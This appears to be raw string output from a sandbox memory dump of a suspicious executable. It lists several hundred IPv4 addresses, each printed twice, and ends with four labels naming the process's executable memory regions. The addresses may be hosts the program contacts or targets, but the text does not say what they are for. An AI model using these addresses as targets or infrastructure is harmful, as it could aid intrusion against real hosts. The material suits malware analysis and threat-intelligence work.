125.46.4.116
222.89.157.211
222.89.157.211
202.110.93.30
202.110.93.30
1.199.59.15
1.199.59.15
218.29.225.254
218.29.225.254
218.28.57.38
218.28.57.38
61.163.37.10
61.163.37.10
218.28.180.250
218.28.180.250
1.194.185.214
1.194.185.214
123.7.39.236
123.7.39.236
218.28.90.108
218.28.90.108
61.163.180.56
61.163.180.56
61.136.64.214
61.136.64.214
1.197.15.172
1.197.15.172
218.28.25.242
218.28.25.242
222.139.245.242
222.139.245.242
202.110.73.148
202.110.73.148
222.138.2.44
222.138.2.44
218.28.101.22
218.28.101.22
222.89.229.91
222.89.229.91
202.110.75.98
202.110.75.98
123.7.180.6
123.7.180.6
218.28.20.46
218.28.20.46
222.88.251.23
222.88.251.23
61.163.37.21
61.163.37.21
218.28.65.126
218.28.65.126
218.28.182.238
218.28.182.238
218.28.245.118
218.28.245.118
123.15.37.186
123.15.37.186
219.150.117.107
219.150.117.107
61.54.225.136
61.54.225.136
61.136.65.110
61.136.65.110
222.89.11.42
222.89.11.42
123.15.51.162
123.15.51.162
61.136.65.74
61.136.65.74
222.139.221.172
222.139.221.172
61.163.36.18
61.163.36.18
221.14.150.37
221.14.150.37
61.136.65.62
61.136.65.62
61.136.65.54
61.136.65.54
61.136.115.188
61.136.115.188
222.88.116.25
222.88.116.25
61.136.65.126
61.136.65.126
218.28.74.202
218.28.74.202
218.28.106.202
218.28.106.202
61.163.179.100
61.163.179.100
202.110.73.134
202.110.73.134
222.89.219.8
222.89.219.8
218.28.25.174
218.28.25.174
123.7.51.83
123.7.51.83
125.46.94.70
125.46.94.70
61.163.37.27
61.163.37.27
218.29.98.190
218.29.98.190
61.136.65.50
61.136.65.50
218.28.85.118
218.28.85.118
218.28.51.228
218.28.51.228
61.163.36.30
61.163.36.30
61.136.65.78
61.136.65.78
218.28.224.82
218.28.224.82
222.89.229.58
222.89.229.58
171.15.254.156
171.15.254.156
218.28.216.50
218.28.216.50
218.29.234.66
218.29.234.66
222.139.245.86
222.139.245.86
125.46.48.226
125.46.48.226
61.163.36.10
61.163.36.10
218.28.53.219
218.28.53.219
61.163.219.150
61.163.219.150
202.110.72.21
202.110.72.21
125.46.97.58
125.46.97.58
222.85.0.166
222.85.0.166
123.7.86.37
123.7.86.37
61.163.224.198
61.163.224.198
218.28.245.238
218.28.245.238
61.136.65.86
61.136.65.86
171.15.254.140
171.15.254.140
61.54.227.42
61.54.227.42
218.29.4.89
218.29.4.89
61.163.36.65
61.163.36.65
202.110.73.211
202.110.73.211
123.7.56.25
123.7.56.25
218.29.98.166
218.29.98.166
222.88.208.200
222.88.208.200
61.136.65.146
61.136.65.146
219.150.120.221
219.150.120.221
61.54.227.9
61.54.227.9
218.28.188.122
218.28.188.122
222.88.219.102
222.88.219.102
219.147.48.5
219.147.48.5
123.7.55.103
123.7.55.103
218.28.178.138
218.28.178.138
123.7.81.234
123.7.81.234
123.7.142.134
123.7.142.134
218.28.96.113
218.28.96.113
61.136.99.38
61.136.99.38
61.163.38.64
61.163.38.64
61.136.65.94
61.136.65.94
218.28.86.214
218.28.86.214
61.163.33.125
61.163.33.125
61.163.37.122
61.163.37.122
61.163.36.63
61.163.36.63
123.13.179.81
123.13.179.81
218.29.239.206
218.29.239.206
218.29.234.98
218.29.234.98
222.89.160.180
222.89.160.180
61.163.36.82
61.163.36.82
219.156.151.22
219.156.151.22
218.29.6.82
218.29.6.82
125.40.181.144
125.40.181.144
61.136.79.218
61.136.79.218
202.110.75.2
202.110.75.2
218.28.178.134
218.28.178.134
202.110.73.171
202.110.73.171
61.136.65.66
61.136.65.66
218.29.37.136
218.29.37.136
222.89.39.91
222.89.39.91
123.7.63.45
123.7.63.45
218.29.134.146
218.29.134.146
61.54.6.57
61.54.6.57
61.136.99.66
61.136.99.66
218.29.216.98
218.29.216.98
61.163.36.26
61.163.36.26
218.29.63.34
218.29.63.34
218.29.37.194
218.29.37.194
125.46.4.162
125.46.4.162
61.54.227.2
61.54.227.2
222.141.69.2
222.141.69.2
218.29.8.12
218.29.8.12
61.136.115.157
61.136.115.157
123.7.81.236
123.7.81.236
61.136.108.46
61.136.108.46
218.28.103.142
218.28.103.142
61.53.134.140
61.53.134.140
202.110.72.159
202.110.72.159
222.89.156.101
222.89.156.101
218.28.78.132
218.28.78.132
61.163.77.186
61.163.77.186
219.157.72.6
219.157.72.6
123.7.113.36
123.7.113.36
61.163.36.44
61.163.36.44
218.28.67.2
218.28.67.2
202.110.93.242
202.110.93.242
218.29.8.2
218.29.8.2
218.29.37.170
218.29.37.170
61.163.164.78
61.163.164.78
61.136.115.171
61.136.115.171
123.52.136.212
123.52.136.212
61.136.115.140
61.136.115.140
61.136.65.38
61.136.65.38
218.28.124.146
218.28.124.146
61.163.164.74
61.163.164.74
222.85.68.110
222.85.68.110
218.29.6.77
218.29.6.77
123.15.37.122
123.15.37.122
202.110.85.78
202.110.85.78
123.101.143.19
123.101.143.19
218.28.218.65
218.28.218.65
222.89.133.124
222.89.133.124
218.28.57.14
218.28.57.14
202.110.72.182
202.110.72.182
218.28.91.11
218.28.91.11
123.7.14.141
123.7.14.141
218.29.233.202
218.29.233.202
218.29.62.170
218.29.62.170
202.110.73.124
202.110.73.124
218.29.5.61
218.29.5.61
61.163.164.77
61.163.164.77
61.54.13.234
61.54.13.234
202.110.85.54
202.110.85.54
218.28.75.122
218.28.75.122
219.154.133.71
219.154.133.71
219.156.151.20
219.156.151.20
125.45.158.20
125.45.158.20
123.13.204.230
123.13.204.230
61.136.108.102
61.136.108.102
218.28.30.235
218.28.30.235
171.8.252.51
171.8.252.51
218.28.58.150
218.28.58.150
218.28.245.230
218.28.245.230
61.163.32.73
61.163.32.73
219.156.158.110
219.156.158.110
218.28.51.242
218.28.51.242
218.28.218.61
218.28.218.61
219.150.205.104
219.150.205.104
218.29.233.18
218.29.233.18
123.7.53.244
123.7.53.244
222.89.7.87
222.89.7.87
219.156.138.119
219.156.138.119
61.136.71.162
61.136.71.162
218.28.49.126
218.28.49.126
123.7.183.160
123.7.183.160
219.150.127.47
219.150.127.47
202.110.73.6
202.110.73.6
218.29.37.38
218.29.37.38
61.163.37.19
61.163.37.19
222.89.155.119
222.89.155.119
125.45.237.121
125.45.237.121
61.136.71.34
61.136.71.34
61.163.37.75
61.163.37.75
218.28.135.90
218.28.135.90
202.111.140.52
202.111.140.52
222.85.52.12
222.85.52.12
123.7.116.98
123.7.116.98
218.29.14.135
218.29.14.135
61.163.27.110
61.163.27.110
218.29.37.143
218.29.37.143
61.163.32.18
61.163.32.18
123.7.85.238
123.7.85.238
219.156.151.18
219.156.151.18
218.28.50.246
218.28.50.246
202.110.72.164
202.110.72.164
123.54.152.130
123.54.152.130
218.28.50.130
218.28.50.130
61.136.65.170
61.136.65.170
218.29.232.162
218.29.232.162
61.163.164.130
61.163.164.130
218.29.56.28
218.29.56.28
1.192.147.173
1.192.147.173
221.15.44.52
221.15.44.52
61.163.36.45
61.163.36.45
218.28.169.122
218.28.169.122
219.154.156.161
219.154.156.161
61.163.37.26
61.163.37.26
222.88.195.72
222.88.195.72
123.13.237.16
123.13.237.16
218.28.58.98
218.28.58.98
219.150.227.4
219.150.227.4
218.28.238.243
218.28.238.243
218.28.56.106
218.28.56.106
61.163.32.37
61.163.32.37
218.29.37.79
218.29.37.79
218.28.50.202
218.28.50.202
61.158.171.60
61.158.171.60
123.7.82.21
123.7.82.21
61.163.32.76
61.163.32.76
61.158.169.58
61.158.169.58
123.53.198.244
123.53.198.244
218.28.85.58
218.28.85.58
222.89.160.138
222.89.160.138
125.46.6.198
125.46.6.198
61.136.64.90
61.136.64.90
202.110.67.74
202.110.67.74
123.7.53.156
123.7.53.156
202.110.81.170
202.110.81.170
61.158.175.57
61.158.175.57
218.29.55.213
218.29.55.213
123.7.183.20
123.7.183.20
61.54.6.202
61.54.6.202
61.54.6.238
61.54.6.238
222.88.71.80
222.88.71.80
125.46.95.246
125.46.95.246
61.163.36.56
61.163.36.56
123.53.85.17
123.53.85.17
218.28.50.38
218.28.50.38
123.7.88.244
123.7.88.244
123.7.87.88
123.7.87.88
222.85.35.11
222.85.35.11
202.110.85.114
202.110.85.114
218.29.230.14
218.29.230.14
218.28.122.46
218.28.122.46
218.28.224.162
218.28.224.162
222.88.71.130
222.88.71.130
222.89.1.183
222.89.1.183
222.89.218.39
222.89.218.39
123.54.153.63
123.54.153.63
219.154.45.66
219.154.45.66
218.28.180.30
218.28.180.30
218.28.65.88
218.28.65.88
125.46.97.42
125.46.97.42
218.29.5.137
218.29.5.137
222.139.212.226
222.139.212.226
218.29.235.22
218.29.235.22
222.88.153.85
222.88.153.85
219.157.127.18
219.157.127.18
218.28.100.230
218.28.100.230
202.110.73.147
202.110.73.147
218.28.117.62
218.28.117.62
222.89.243.106
222.89.243.106
115.55.77.215
115.55.77.215
61.163.33.115
61.163.33.115
61.163.116.186
61.163.116.186
61.54.246.227
61.54.246.227
61.54.225.199
61.54.225.199
218.28.21.75
218.28.21.75
218.28.71.78
218.28.71.78
61.54.246.243
61.54.246.243
222.139.5.81
222.139.5.81
218.29.38.20
218.29.38.20
218.29.5.57
218.29.5.57
182.126.240.8
182.126.240.8
219.154.46.2
219.154.46.2
61.136.115.166
61.136.115.166
219.156.168.50
219.156.168.50
123.13.204.140
123.13.204.140
123.13.206.24
123.13.206.24
219.150.227.19
219.150.227.19
219.150.205.18
219.150.205.18
222.88.195.76
222.88.195.76
125.46.14.164
125.46.14.164
218.28.50.142
218.28.50.142
218.28.8.194
218.28.8.194
171.8.66.16
171.8.66.16
218.29.55.124
218.29.55.124
218.29.214.78
218.29.214.78
115.56.230.218
115.56.230.218
125.46.76.188
125.46.76.188
123.7.178.215
123.7.178.215
219.154.46.102
219.154.46.102
123.101.224.185
123.101.224.185
123.52.127.16
123.52.127.16
61.163.164.45
61.163.164.45
222.139.5.137
222.139.5.137
221.13.152.214
221.13.152.214
218.28.216.146
218.28.216.146
115.56.225.194
115.56.225.194
222.139.6.88
222.139.6.88
%original file name%.exe_516_rwx_02561000_0005E000:
%original file name%.exe_516_rwx_02631000_0004D000:
%original file name%.exe_516_rwx_02691000_00063000:
%original file name%.exe_516_rwx_11001000_0002E000: